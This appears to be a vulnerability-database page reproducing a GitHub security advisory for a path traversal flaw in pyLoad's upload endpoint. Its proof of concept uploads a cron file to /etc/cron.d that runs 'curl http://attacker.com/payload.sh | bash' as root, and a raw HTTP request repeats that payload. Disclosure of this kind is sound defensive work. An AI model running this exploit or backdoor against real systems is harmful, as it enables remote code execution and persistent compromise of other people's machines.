Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-xqpg-92fq-grfg

GitHub Security Advisory

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

✓ GitHub Reviewed HIGH Has CVE
View on GitHub

Advisory Details

## Summary
An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**

---

### Vulnerable Code

File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)

```python
@json_blueprint.route("/upload", methods=["POST"])
def upload():
dir_path = api.get_config_value("general", "storage_folder")
for file in request.files.getlist("file"):
file_path = os.path.join(dir_path, "tmp_" + file.filename)
file.save(file_path)
```
**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.

### (Proof of Concept)

1. **Clone and install pyLoad from source** (`pip install pyload-ng`):

```bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
```

2. **Or install via pip (PyPi) in virtualenv:**

```bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
```

1. **Login and obtain session token**
```bash
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
-d "username=admin&password=admin"
```

2. **Create malicious cron payload**
```bash
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
```

3. **Upload file with path traversal filename**
```bash
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
-F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
```

4. On the next cron tick, a reverse shell or payload will be triggered.

### BurpSuite HTTP Request

```
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```

Affected Packages

PyPI pyload-ng
Affected versions: 0.5.0b3.dev89 (fixed in 0.5.0b3.dev90)

Related CVEs

CVE-2025-54140

Key Information

GHSA ID
GHSA-xqpg-92fq-grfg
Published
July 21, 2025 9:16 PM
Last Modified
July 23, 2025 1:37 PM
CVSS Score
7.5 /10
Primary Ecosystem
PyPI
Primary Package
pyload-ng
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 25, 2025 6:37 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.